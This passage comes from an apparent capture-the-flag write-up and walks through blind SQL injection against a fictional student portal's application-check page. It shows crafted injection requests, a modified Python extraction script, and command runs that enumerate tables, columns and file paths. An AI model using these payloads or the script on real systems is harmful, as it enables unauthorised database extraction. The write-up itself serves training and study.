&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/application-check.php?elfmail=garbage%40garbage.com&amp;#39;+OR+(SELECT+MID(DATABASE(),1,1))%3d&amp;#39;a&amp;amp;token=MTAwOTkwNjc5NDI0MTU3Nzk3OTM2NjEwMDk5MDY3OS40MjQ%3D_MTI5MjY4MDY5NjYyNzIzMjMxNzAxNzQxLjU2OA%3D%3D&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;studentportal.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;2710&lt;/span&gt;

[...]
No application found!
[...]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the first letter is not &lt;code&gt;a&lt;/code&gt;. We keep trying letters, until finally:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/application-check.php?elfmail=garbage%40garbage.com&amp;#39;+OR+(SELECT+MID(DATABASE(),1,1))%3d&amp;#39;e&amp;amp;token=MTAwOTkwNjc5NDI0MTU3Nzk3OTM2NjEwMDk5MDY3OS40MjQ%3D_MTI5MjY4MDY5NjYyNzIzMjMxNzAxNzQxLjU2OA%3D%3D&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;studentportal.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;2710&lt;/span&gt;

[...]
Your application is still pending!
[...]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the first letter of the database is &lt;code&gt;e&lt;/code&gt;. We can now find the next
letter. If we keep going, we'll find that the data base is &lt;code&gt;elfu&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Awesome, we can extract information from the database! Let's automate the
process, because doing this manually takes too much time. Luckily for me, I've
written in the past &lt;a class="reference external" href="https://github.com/the-useless-one/blind_injection"&gt;a little Python script&lt;/a&gt;
to help me exploit blind SQL injection. We just have to make a few
modifications to the &lt;code&gt;injection.py&lt;/code&gt; file, to modify the syntax of the
injection, and to call the validator URL to get our validation token before
every request:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;injection&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;target_url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;column&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;table&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;where&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;token_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;https://studentportal.elfu.org/validator.php&amp;#39;&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;[wait] retrieving data:&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;end&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\t&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;flush&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

    &lt;span class="c1"&gt;# While we don&amp;#39;t have the entire data&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;char&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="c1"&gt;# The injection performed here is URL-based&lt;/span&gt;
            &lt;span class="c1"&gt;# To use another mean of injection (HTTP Headers, Cookies...)&lt;/span&gt;
            &lt;span class="c1"&gt;# change the crafting between the hashtags&lt;/span&gt;

            &lt;span class="c1"&gt;#### CHANGE HERE&lt;/span&gt;
            &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;token_url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;?&amp;#39;&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;target_url&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;separator&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;amp;&amp;#39;&lt;/span&gt;
            &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;separator&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;?&amp;#39;&lt;/span&gt;

            &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;target_url&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;separator&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;elfmail=garbage@garbage.com&amp;#39; OR &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; \
                    &lt;span class="s2"&gt;&amp;quot;(select mid(lpad(bin(ord(mid({0},{1},1))),7,&amp;#39;0&amp;#39;),{2},1) &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; \
                    &lt;span class="s2"&gt;&amp;quot;from {3} {4} &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; \
                    &lt;span class="s2"&gt;&amp;quot;limit {5},1)=&amp;#39;1&amp;amp;token={6}&amp;quot;&lt;/span&gt;
            &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;column&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;table&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;where&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

            &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="c1"&gt;#### END OF CHANGE&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, you can see that the syntax of the injection is a little bit different
from what I show earlier. Let's break it down:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;MID&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPAD&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;BIN&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ORD&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;MID&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="k"&gt;column_name&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;index_i&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))),&lt;/span&gt;&lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;index_j&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;I first call &lt;code&gt;MID&lt;/code&gt; to retrieve a particular character from the data.&lt;/li&gt;
&lt;li&gt;I then call &lt;code&gt;ORD&lt;/code&gt;, to get the ASCII code of this letter.&lt;/li&gt;
&lt;li&gt;I then call &lt;code&gt;BIN&lt;/code&gt;, to convert this ASCII code to binary.&lt;/li&gt;
&lt;li&gt;Then, I call &lt;code&gt;LPAD(___, 7, '0')&lt;/code&gt; to pad this binary string with zeros,
until it has a length of 7.&lt;/li&gt;
&lt;li&gt;I then call &lt;code&gt;MID&lt;/code&gt; again, to extract a particular bit from this binary
string.&lt;/li&gt;
&lt;li&gt;I then test to see if this bit is equal to one or not.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This allows me to retrieve the string I'm interested in bit by bit, instead of
character by character. It's a little bit faster.&lt;/p&gt;
&lt;p&gt;So, let's run this script to retrieve information from the database. First,
let's get the different tables for the &lt;code&gt;elfu&lt;/code&gt; database:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c table_name -t information_schema.tables -w &lt;span class="s2"&gt;&amp;quot;WHERE table_schema=&amp;#39;elfu&amp;#39;&amp;quot;&lt;/span&gt; -i &lt;span class="m"&gt;0&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:    applications
&lt;span class="hll"&gt;found: applications
&lt;/span&gt;$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c table_name -t information_schema.tables -w &lt;span class="s2"&gt;&amp;quot;WHERE table_schema=&amp;#39;elfu&amp;#39;&amp;quot;&lt;/span&gt; -i &lt;span class="m"&gt;1&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:    krampus
&lt;span class="hll"&gt;found: krampus
&lt;/span&gt;$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c table_name -t information_schema.tables -w &lt;span class="s2"&gt;&amp;quot;WHERE table_schema=&amp;#39;elfu&amp;#39;&amp;quot;&lt;/span&gt; -i &lt;span class="m"&gt;2&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:    students
&lt;span class="hll"&gt;found: students
&lt;/span&gt;$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c table_name -t information_schema.tables -w &lt;span class="s2"&gt;&amp;quot;WHERE table_schema=&amp;#39;elfu&amp;#39;&amp;quot;&lt;/span&gt; -i &lt;span class="m"&gt;3&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:
no result found
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, the table &lt;code&gt;krampus&lt;/code&gt; seems interesting. Let's see the columns of
this table:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c column_name -t information_schema.columns -w &lt;span class="s2"&gt;&amp;quot;WHERE table_name=&amp;#39;krampus&amp;#39;&amp;quot;&lt;/span&gt; -i &lt;span class="m"&gt;0&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data: id
&lt;span class="hll"&gt;found: id
&lt;/span&gt;$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c column_name -t information_schema.columns -w &lt;span class="s2"&gt;&amp;quot;WHERE table_name=&amp;#39;krampus&amp;#39;&amp;quot;&lt;/span&gt; -i &lt;span class="m"&gt;1&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data: path
&lt;span class="hll"&gt;found: path
&lt;/span&gt;$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c column_name -t information_schema.columns -w &lt;span class="s2"&gt;&amp;quot;WHERE table_name=&amp;#39;krampus&amp;#39;&amp;quot;&lt;/span&gt; -i &lt;span class="m"&gt;2&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:
no result found
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Two columns, &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;path&lt;/code&gt;. Let's extract data from the
&lt;code&gt;path&lt;/code&gt; column:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c path -t krampus -i &lt;span class="m"&gt;0&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:    /krampus/0f5f510e.png
found: /krampus/0f5f510e.png
$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c path -t krampus -i &lt;span class="m"&gt;1&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:    /krampus/1cc7e121.png
found: /krampus/1cc7e121.png
$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c path -t krampus -i &lt;span class="m"&gt;2&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:    /krampus/439f15e6.png
found: /krampus/439f15e6.png
$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c path -t krampus -i &lt;span class="m"&gt;3&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:    /krampus/667d6896.png
found: /krampus/667d6896.png
$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c path -t krampus -i &lt;span class="m"&gt;4&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:    /krampus/adb798ca.png
found: /krampus/adb798ca.png
$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c path -t krampus -i &lt;span class="m"&gt;5&lt;/span&gt;
Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:    /krampus/ba417715.png
found: /krampus/ba417715.png
$ ./blind_injection.py -u &lt;span class="s2"&gt;&amp;quot;https://studentportal.elfu.org/application-check.php&amp;quot;&lt;/span&gt; -s &lt;span class="s1"&gt;&amp;#39;still pending!&amp;#39;&lt;/span&gt; -c path -t krampus -i &lt;span class="m"&gt;6&lt;/span&gt;
